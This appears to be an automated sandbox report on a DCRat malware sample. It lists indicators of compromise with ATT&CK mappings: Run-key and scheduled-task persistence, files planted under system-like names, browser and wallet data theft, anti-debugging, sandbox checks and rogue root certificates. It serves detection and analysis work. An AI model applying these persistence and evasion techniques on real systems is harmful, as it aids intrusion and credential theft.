dcrat | 64932e913bf900fa525052b0d25f594139485915fb858dd3970df55b43b9ec5b

System Information Discovery

Processes:

arnatic_6.exeyxM2uV2FTRymgklp8YctuBBI.exei4kQYiLo_Xoj5h41XqopJpAD.exeRuntimeBroker.exeInstall.exeGKAEL.exe64932e913bf900fa525052b0d25f594139485915fb858dd3970df55b43b9ec5b.exearnatic_3.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	arnatic_6.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	yxM2uV2FTRymgklp8YctuBBI.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	i4kQYiLo_Xoj5h41XqopJpAD.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	RuntimeBroker.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	GKAEL.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	64932e913bf900fa525052b0d25f594139485915fb858dd3970df55b43b9ec5b.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	arnatic_3.exe

Loads dropped DLL 11 IoCs

Processes:

setup_install.exearnatic_2.exerUNdlL32.eXerundll32.exe

pid	process
2752	setup_install.exe
2752	setup_install.exe
2752	setup_install.exe
2752	setup_install.exe
2752	setup_install.exe
2752	setup_install.exe
2752	setup_install.exe
3744	arnatic_2.exe
2876	rUNdlL32.eXe
112	rundll32.exe
112	rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 9 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

Processes:

18E7E.exeRuntimeBroker.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Roaming\\NVIDIA\\dllhost.exe"	18E7E.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\U6CzE6TUlznQXVAFWfCiuZnR = "\"C:\\Windows\\it-IT\\U6CzE6TUlznQXVAFWfCiuZnR.exe\""	RuntimeBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\U6CzE6TUlznQXVAFWfCiuZnR = "\"C:\\Documents and Settings\\U6CzE6TUlznQXVAFWfCiuZnR.exe\""	RuntimeBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\sihost = "\"C:\\Windows\\System32\\mfc100\\sihost.exe\""	RuntimeBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\zg71lq8733KC65bX624m8tqW = "\"C:\\Recovery\\WindowsRE\\zg71lq8733KC65bX624m8tqW.exe\""	RuntimeBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\sihost = "\"C:\\Windows\\System32\\Windows.Networking.Vpn\\sihost.exe\""	RuntimeBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Program Files\\Mozilla Firefox\\RuntimeBroker.exe\""	RuntimeBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Program Files\\Microsoft Office 15\\ClientX64\\conhost.exe\""	RuntimeBroker.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Program Files\\Windows Portable Devices\\sppsvc.exe\""	RuntimeBroker.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

96 api.db-ip.com
97 api.db-ip.com
10 ip-api.com
91 ipinfo.io
92 ipinfo.io

flow	ioc
96	api.db-ip.com
97	api.db-ip.com
10	ip-api.com
91	ipinfo.io
92	ipinfo.io

Drops file in System32 directory 5 IoCs

Processes:

RuntimeBroker.exeInstall.exe

description	ioc	process
File created	C:\Windows\SysWOW64\Windows.Networking.Vpn\sihost.exe	RuntimeBroker.exe
File created	C:\Windows\SysWOW64\Windows.Networking.Vpn\66fc9ff0ee96c2	RuntimeBroker.exe
File created	C:\Windows\SysWOW64\mfc100\sihost.exe	RuntimeBroker.exe
File created	C:\Windows\SysWOW64\mfc100\66fc9ff0ee96c2	RuntimeBroker.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 15 IoCs

Processes:

zdwpMJqFcqWr3YEUvTC3idHK.exeZGn6AwVZy9bMQ_xay87jBBhP.exeZXtFTIxdF8eeInhLDxuQg75q.exeusRt7SmHseL2_OtFsuwHtXGf.exeMljZbu7ph9NCUEiSW32GErzR.exeJDBJ1.exeRuntimeBroker.exeBI63G.exe24J0M.exe18E7E.exe

pid	process
2380	zdwpMJqFcqWr3YEUvTC3idHK.exe
4372	ZGn6AwVZy9bMQ_xay87jBBhP.exe
3388	ZXtFTIxdF8eeInhLDxuQg75q.exe
3388	ZXtFTIxdF8eeInhLDxuQg75q.exe
4592	usRt7SmHseL2_OtFsuwHtXGf.exe
1864	MljZbu7ph9NCUEiSW32GErzR.exe
1328	JDBJ1.exe
3388	RuntimeBroker.exe
2348	BI63G.exe
4220	24J0M.exe
4520	18E7E.exe
3388	RuntimeBroker.exe
3388	RuntimeBroker.exe
3388	RuntimeBroker.exe
3388	RuntimeBroker.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

arnatic_7.exe

description pid process target process

PID 2316 set thread context of 1272 2316 arnatic_7.exe arnatic_7.exe

description	pid	process	target process
PID 2316 set thread context of 1272	2316	arnatic_7.exe	arnatic_7.exe

Drops file in Program Files directory 7 IoCs

Processes:

RuntimeBroker.exe

description	ioc	process
File created	C:\Program Files\Mozilla Firefox\9e8d7a4ca61bd9	RuntimeBroker.exe
File created	C:\Program Files\Microsoft Office 15\ClientX64\conhost.exe	RuntimeBroker.exe
File created	C:\Program Files\Microsoft Office 15\ClientX64\088424020bedd6	RuntimeBroker.exe
File created	C:\Program Files\Windows Portable Devices\sppsvc.exe	RuntimeBroker.exe
File opened for modification	C:\Program Files\Windows Portable Devices\sppsvc.exe	RuntimeBroker.exe
File created	C:\Program Files\Windows Portable Devices\0a1fd5f707cd16	RuntimeBroker.exe
File created	C:\Program Files\Mozilla Firefox\RuntimeBroker.exe	RuntimeBroker.exe

Drops file in Windows directory 2 IoCs

Processes:

RuntimeBroker.exe

description	ioc	process
File created	C:\Windows\it-IT\U6CzE6TUlznQXVAFWfCiuZnR.exe	RuntimeBroker.exe
File created	C:\Windows\it-IT\87c1cef5a3285c	RuntimeBroker.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 16 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
3164	2876	WerFault.exe	rUNdlL32.eXe
4468	1668	WerFault.exe	arnatic_1.exe
3348	4248	WerFault.exe	U6CzE6TUlznQXVAFWfCiuZnR.exe
4524	2284	WerFault.exe	HivQFfTyTbtcn9Vi270uOalU.exe
3020	756	WerFault.exe	llxT0QZHj1LDj4GiV1quNPLq.exe
2000	1692	WerFault.exe	zg71lq8733KC65bX624m8tqW.exe
3724	2284	WerFault.exe	HivQFfTyTbtcn9Vi270uOalU.exe
1456	1404	WerFault.exe	Rq16YJTzBSjm0w4RvKVQ88GB.exe
2964	1692	WerFault.exe	zg71lq8733KC65bX624m8tqW.exe
1668	756	WerFault.exe	llxT0QZHj1LDj4GiV1quNPLq.exe
2572	1404	WerFault.exe	Rq16YJTzBSjm0w4RvKVQ88GB.exe
2960	1404	WerFault.exe	Rq16YJTzBSjm0w4RvKVQ88GB.exe
4016	1404	WerFault.exe	Rq16YJTzBSjm0w4RvKVQ88GB.exe
4092	1404	WerFault.exe	Rq16YJTzBSjm0w4RvKVQ88GB.exe
620	1404	WerFault.exe	Rq16YJTzBSjm0w4RvKVQ88GB.exe
4512	1404	WerFault.exe	Rq16YJTzBSjm0w4RvKVQ88GB.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

arnatic_2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	arnatic_2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	arnatic_2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	arnatic_2.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

0df8c02b-319b-4159-a69c-ccee3707fb1b.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	0df8c02b-319b-4159-a69c-ccee3707fb1b.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	0df8c02b-319b-4159-a69c-ccee3707fb1b.exe

Creates scheduled task(s) 1 TTPs 10 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
2856	schtasks.exe
4964	schtasks.exe
3220	schtasks.exe
3612	schtasks.exe
768	schtasks.exe
3364	schtasks.exe
4064	schtasks.exe
4616	schtasks.exe
2844	schtasks.exe
4020	schtasks.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

3764 tasklist.exe
3612 tasklist.exe

pid	process
3764	tasklist.exe
3612	tasklist.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

Processes:

Install.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

3796 taskkill.exe

pid	process
3796	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

Processes:

81DDDJKEML44GM9.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\IESettingSync	81DDDJKEML44GM9.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	81DDDJKEML44GM9.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	81DDDJKEML44GM9.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	81DDDJKEML44GM9.exe

Modifies registry class 3 IoCs

Processes:

arnatic_3.exeRuntimeBroker.exeGKAEL.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	arnatic_3.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings	GKAEL.exe

Modifies system certificate store 2 TTPs 10 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

Processes:

18E7E.exearnatic_1.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\07E032E020B72C3F192F0628A2593A19A70F069E\Blob = 5c000000010000000400000000080000040000000100000010000000d5e98140c51869fc462c8975620faa7803000000010000001400000007e032e020b72c3f192f0628a2593a19a70f069e1d0000000100000010000000e3f9af952c6df2aaa41706a77a44c2031400000001000000140000000876cdcb07ff24f6c5cdedbb90bce284374675f76200000001000000200000005c58468d55f58e497e743982d2b50010b6d165374acf83a7d4a32db768c4408e0b0000000100000034000000430065007200740075006d002000540072007500730074006500640020004e006500740077006f0072006b002000430041000000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000006500000030633021060b2a84680186f6770205010130123010060a2b0601040182373c0101030200c03021060b2a84680186f6770205010730123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000a8569ccd21ef9cc5737c7a12df608c2cbc545df11900000001000000100000001f7e750b566b128ac0b8d6576d2a70a52000000001000000bf030000308203bb308202a3a00302010202030444c0300d06092a864886f70d0101050500307e310b300906035504061302504c31223020060355040a1319556e697a65746f20546563686e6f6c6f6769657320532e412e31273025060355040b131e43657274756d2043657274696669636174696f6e20417574686f72697479312230200603550403131943657274756d2054727573746564204e6574776f726b204341301e170d3038313032323132303733375a170d3239313233313132303733375a307e310b300906035504061302504c31223020060355040a1319556e697a65746f20546563686e6f6c6f6769657320532e412e31273025060355040b131e43657274756d2043657274696669636174696f6e20417574686f72697479312230200603550403131943657274756d2054727573746564204e6574776f726b20434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e3fb7da372bac2f0c91487f56b014ee16e4007ba6d275d7ff75b2db35ac7515faba432a66187b66e0f86d2300297f8d76957a118395d6a6479c60159ac3c314a387cd204d24b28e8205f3b07a2cc4d73dbf3ae4fc756d55aa79689faf3ab68d423865927cf0927bcac6e72831c3072dfe0a2e9d2e1747519bd2a9e7b1554041bd74339ad5528c5e21abbf4c0e4ae384933cc76859f3945d2a49ef2128c51f87ce42d7ff5ac5feb169fb12dd1bacc9142774c25c990386fdbf0ccfb8e1e97593ed5604ee60528ed4979134bba48db2ff972d339cafe1fd83472f5b440cf3101c3ecde112d175d1fb850d15e19a769de073328ca5095f9a754cb54865045a9f9490203010001a3423040300f0603551d130101ff040530030101ff301d0603551d0e041604140876cdcb07ff24f6c5cdedbb90bce284374675f7300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100a6a8ad22ce013da6a3ff62d0489d8b5e72b07844e3dc1caf09fd2348fabd2ac4b95504b510a38d27de0b8263d0eede0c3779415b22b2b09a415ca670e0d4d077cb23d300e06c562fe1690d0dd9aabf218150d906a5a8ff9537d0aafee2b3f5992d45848ae54209d774022ff789d899e9bc27d4478dba0d461c77cf14a41cb9a431c49c28740334ff331926a5e90d74b73e97c676e82796a366dde1aef2415bca9856837370e4861ad23141ba2fbe2d135a766f4ee84e810e3f5b0322a012be6658114acb03c4b42a2a2d9617e03954bc48d376279d9a2d06a6c9ec39d2abdb9f9a0b27023529b14095e7f9e89c55881946d6b734f57ece399ad938f151f74f2c	18E7E.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\6252DC40F71143A22FDE9EF7348E064251B18118	18E7E.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\6252DC40F71143A22FDE9EF7348E064251B18118\Blob = 0400000001000000100000002c8f9f661d1890b147269d8e86828ca90f00000001000000140000001e427a3639cce4c27e94b1777964ca289a722cad09000000010000003e000000303c06082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030906082b0601050507030106082b06010505070308620000000100000020000000d8e0febc1db2e38d00940f37d27d41344d993e734b99d5656d9778d4d81436247f0000000100000016000000301406082b0601050507030906082b060105050703011400000001000000140000006daa9b0987c4d0d422ed4007374d19f191ffded31d000000010000001000000096f98b6e79a74810ce7d398a82f977780b000000010000000e000000430065007200740075006d0000007e00000001000000080000000000cf97a737d6010300000001000000140000006252dc40f71143a22fde9ef7348e064251b181181900000001000000100000000b6cd9778e41ad67fd6be0a6903710442000000001000000100300003082030c308201f4a0030201020203010020300d06092a864886f70d0101050500303e310b300906035504061302504c311b3019060355040a1312556e697a65746f2053702e207a206f2e6f2e311230100603550403130943657274756d204341301e170d3032303631313130343633395a170d3237303631313130343633395a303e310b300906035504061302504c311b3019060355040a1312556e697a65746f2053702e207a206f2e6f2e311230100603550403130943657274756d20434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ceb1c12ed34f7ccd25ce183e4fc48c6f806a73c85b51f89bd2dcbb005cb1a0fc7503ee81f088ee2352e9e615338dac2d09c576f92b398089e4974b90a5a878f873437ba461b0d858cce16c667e9cf3095e556384d5a8eff3b12e3068b3c43cd8ac6e8d995a904e34dc369a8f818850b76d964209f3d795830d414bb06a6bf8fc0f7e629f67c4ed265f10260f084ff0a45728ce8fb8ed45f66eee255daa6e39bee4932fd947a072ebfaa65bafca533fe20ec69656116ef7e966a926d87f9553ed0a8588ba4f29a5428c5eb6fc852000aa680ba11a85019cc446638288b622b1eefeaa46597ecf352cd5b6da5df748331454b6ebd96fcecd88d6ab1bda963b1d590203010001a3133011300f0603551d130101ff040530030101ff300d06092a864886f70d01010505000382010100b88dceefe714bacfeeb044926cb4393ea2846eadb82177d2d4778287e6204181eee2f811b763d11737be1976241c041a4ceb3daa676f2dd4cdfe653170c51ba6020aba607b6d58c29a49fe63320b6be33ac0acab3bb0e8d309518c1083c634e0c52be01ab66014276c32778cbcb27298cfcdcc3fb9c8244214d657fce62643a91de58090ce0354283ef73fd3f84ded6a0a3a93139b3b142313639c3fd1872779e54c51e301ad855d1a3bb1d57310a4d3f2bc6e64f55a5690a8c70e4c740f2e713bf7c847f4696f15f2115e831e9c7c52aefd02da12a8596718dbbc70dd9bb169ed80ce8940486a0e35ca29661521942ce8602a9b854a40f36b8a24ec06162c73	18E7E.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	arnatic_1.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	arnatic_1.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\07E032E020B72C3F192F0628A2593A19A70F069E	18E7E.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\07E032E020B72C3F192F0628A2593A19A70F069E\Blob = 0f0000000100000014000000a8569ccd21ef9cc5737c7a12df608c2cbc545df153000000010000006500000030633021060b2a84680186f6770205010130123010060a2b0601040182373c0101030200c03021060b2a84680186f6770205010730123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080b0000000100000034000000430065007200740075006d002000540072007500730074006500640020004e006500740077006f0072006b0020004300410000006200000001000000200000005c58468d55f58e497e743982d2b50010b6d165374acf83a7d4a32db768c4408e1400000001000000140000000876cdcb07ff24f6c5cdedbb90bce284374675f71d0000000100000010000000e3f9af952c6df2aaa41706a77a44c20303000000010000001400000007e032e020b72c3f192f0628a2593a19a70f069e2000000001000000bf030000308203bb308202a3a00302010202030444c0300d06092a864886f70d0101050500307e310b300906035504061302504c31223020060355040a1319556e697a65746f20546563686e6f6c6f6769657320532e412e31273025060355040b131e43657274756d2043657274696669636174696f6e20417574686f72697479312230200603550403131943657274756d2054727573746564204e6574776f726b204341301e170d3038313032323132303733375a170d3239313233313132303733375a307e310b300906035504061302504c31223020060355040a1319556e697a65746f20546563686e6f6c6f6769657320532e412e31273025060355040b131e43657274756d2043657274696669636174696f6e20417574686f72697479312230200603550403131943657274756d2054727573746564204e6574776f726b20434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e3fb7da372bac2f0c91487f56b014ee16e4007ba6d275d7ff75b2db35ac7515faba432a66187b66e0f86d2300297f8d76957a118395d6a6479c60159ac3c314a387cd204d24b28e8205f3b07a2cc4d73dbf3ae4fc756d55aa79689faf3ab68d423865927cf0927bcac6e72831c3072dfe0a2e9d2e1747519bd2a9e7b1554041bd74339ad5528c5e21abbf4c0e4ae384933cc76859f3945d2a49ef2128c51f87ce42d7ff5ac5feb169fb12dd1bacc9142774c25c990386fdbf0ccfb8e1e97593ed5604ee60528ed4979134bba48db2ff972d339cafe1fd83472f5b440cf3101c3ecde112d175d1fb850d15e19a769de073328ca5095f9a754cb54865045a9f9490203010001a3423040300f0603551d130101ff040530030101ff301d0603551d0e041604140876cdcb07ff24f6c5cdedbb90bce284374675f7300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100a6a8ad22ce013da6a3ff62d0489d8b5e72b07844e3dc1caf09fd2348fabd2ac4b95504b510a38d27de0b8263d0eede0c3779415b22b2b09a415ca670e0d4d077cb23d300e06c562fe1690d0dd9aabf218150d906a5a8ff9537d0aafee2b3f5992d45848ae54209d774022ff789d899e9bc27d4478dba0d461c77cf14a41cb9a431c49c28740334ff331926a5e90d74b73e97c676e82796a366dde1aef2415bca9856837370e4861ad23141ba2fbe2d135a766f4ee84e810e3f5b0322a012be6658114acb03c4b42a2a2d9617e03954bc48d376279d9a2d06a6c9ec39d2abdb9f9a0b27023529b14095e7f9e89c55881946d6b734f57ece399ad938f151f74f2c	18E7E.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\07E032E020B72C3F192F0628A2593A19A70F069E\Blob = 040000000100000010000000d5e98140c51869fc462c8975620faa7803000000010000001400000007e032e020b72c3f192f0628a2593a19a70f069e1d0000000100000010000000e3f9af952c6df2aaa41706a77a44c2031400000001000000140000000876cdcb07ff24f6c5cdedbb90bce284374675f76200000001000000200000005c58468d55f58e497e743982d2b50010b6d165374acf83a7d4a32db768c4408e0b0000000100000034000000430065007200740075006d002000540072007500730074006500640020004e006500740077006f0072006b002000430041000000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000006500000030633021060b2a84680186f6770205010130123010060a2b0601040182373c0101030200c03021060b2a84680186f6770205010730123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000a8569ccd21ef9cc5737c7a12df608c2cbc545df12000000001000000bf030000308203bb308202a3a00302010202030444c0300d06092a864886f70d0101050500307e310b300906035504061302504c31223020060355040a1319556e697a65746f20546563686e6f6c6f6769657320532e412e31273025060355040b131e43657274756d2043657274696669636174696f6e20417574686f72697479312230200603550403131943657274756d2054727573746564204e6574776f726b204341301e170d3038313032323132303733375a170d3239313233313132303733375a307e310b300906035504061302504c31223020060355040a1319556e697a65746f20546563686e6f6c6f6769657320532e412e31273025060355040b131e43657274756d2043657274696669636174696f6e20417574686f72697479312230200603550403131943657274756d2054727573746564204e6574776f726b20434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e3fb7da372bac2f0c91487f56b014ee16e4007ba6d275d7ff75b2db35ac7515faba432a66187b66e0f86d2300297f8d76957a118395d6a6479c60159ac3c314a387cd204d24b28e8205f3b07a2cc4d73dbf3ae4fc756d55aa79689faf3ab68d423865927cf0927bcac6e72831c3072dfe0a2e9d2e1747519bd2a9e7b1554041bd74339ad5528c5e21abbf4c0e4ae384933cc76859f3945d2a49ef2128c51f87ce42d7ff5ac5feb169fb12dd1bacc9142774c25c990386fdbf0ccfb8e1e97593ed5604ee60528ed4979134bba48db2ff972d339cafe1fd83472f5b440cf3101c3ecde112d175d1fb850d15e19a769de073328ca5095f9a754cb54865045a9f9490203010001a3423040300f0603551d130101ff040530030101ff301d0603551d0e041604140876cdcb07ff24f6c5cdedbb90bce284374675f7300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100a6a8ad22ce013da6a3ff62d0489d8b5e72b07844e3dc1caf09fd2348fabd2ac4b95504b510a38d27de0b8263d0eede0c3779415b22b2b09a415ca670e0d4d077cb23d300e06c562fe1690d0dd9aabf218150d906a5a8ff9537d0aafee2b3f5992d45848ae54209d774022ff789d899e9bc27d4478dba0d461c77cf14a41cb9a431c49c28740334ff331926a5e90d74b73e97c676e82796a366dde1aef2415bca9856837370e4861ad23141ba2fbe2d135a766f4ee84e810e3f5b0322a012be6658114acb03c4b42a2a2d9617e03954bc48d376279d9a2d06a6c9ec39d2abdb9f9a0b27023529b14095e7f9e89c55881946d6b734f57ece399ad938f151f74f2c	18E7E.exe
